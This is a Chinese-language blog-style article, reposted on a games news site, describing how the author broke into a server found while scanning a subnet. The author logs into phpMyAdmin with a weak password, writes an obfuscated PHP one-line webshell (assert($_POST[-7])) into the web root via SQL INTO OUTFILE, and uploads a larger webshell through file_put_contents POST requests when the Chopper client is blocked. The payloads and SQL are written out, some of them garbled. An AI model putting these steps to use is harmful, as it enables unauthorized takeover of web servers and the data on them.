木马GetShell的另类姿势

发表时间:2020-05-24 07:35:13 作者: 来源: 浏览:

在上一篇文章中,小编为您详细介绍了关于《 我叫mt2公会副本阵容推荐 我叫mt2公会副本攻略》相关知识。本篇中小编将再为您讲解标题 木马GetShell的另类姿势。

  扫C段时发现一机器有phpMyAdmin服务,小编就尝试了一下弱口令,root123果断进入,然后就开始了接下来的一大串资讯内容。  

  探测IP为某云服务器,普通的一句话木马一写入就被杀掉,后改为混淆一句话木马:assert($_POST[-7]);写入一句话木马SQL(网站路径从phpinfo.php获得,其它姿势亦可):usetest;droptableifexiststemp;createtabletemp(cmdtextNOTNULL);insertintotemp(cmd)values("");selectcmdfromtempintooutfile'D:/phpStudy/WWW/phpMyAdmin/indxe.php';droptableifexiststemp;  用菜刀连接一句话木马,连接上后即提示"连接被重置",估计是屏蔽了本机的出口IP,用VPN、切换代理后同样的问题还是会即时出现,所以放弃用菜刀上传webshell,尝试手工post的方法。  

  这里需要先确定下服务器上file_put_contents()函数是否执行,可行的话再执行下面的操作。  

  首先在本地把大马处理好以便于作为post参数:用到了strip_whitespace()函数【返回已删除PHP注释以及空白字符的源代码文件】,urlencode()函数【对字符串进行url编码处理】,file_get_contents()函数【读取txt文件内容】。  

  C盘根目录下需要放一个strip_shell.php文件(待strip_whitespace的php大马),新建strip.php文件和urlencode.php文件,两文件内容分别为(注意两个函数参数):strip.php:urlencode.php: 最后就要用到AdvancedRESTclient插件这里只需用到POST方法,上面一句话小马的密码为-7,即这里Payload模块的key为-7,参数重要部分如下:file_put_contents("D:/phpStudy/WWW/phpMyAdmin/mysqlx.php",urldecode("复制urldecode.php文件所有内容"));。  

编后语:关于《 木马GetShell的另类姿势》关于知识就介绍到这里,希望本站内容能让您有所收获,如有疑问可跟帖留言,值班小编第一时间回复。 下一篇内容是有关《 iOS9曝指南针Bug iPhone6s部分应用受影响》,感兴趣的同学可以点击进去看看。

资源转载网络,如有侵权联系删除。

相关资讯推荐

相关应用推荐

玩家点评

条评论

热门下载

  • 手机网游
  • 手机软件

热点资讯

  • 最新话题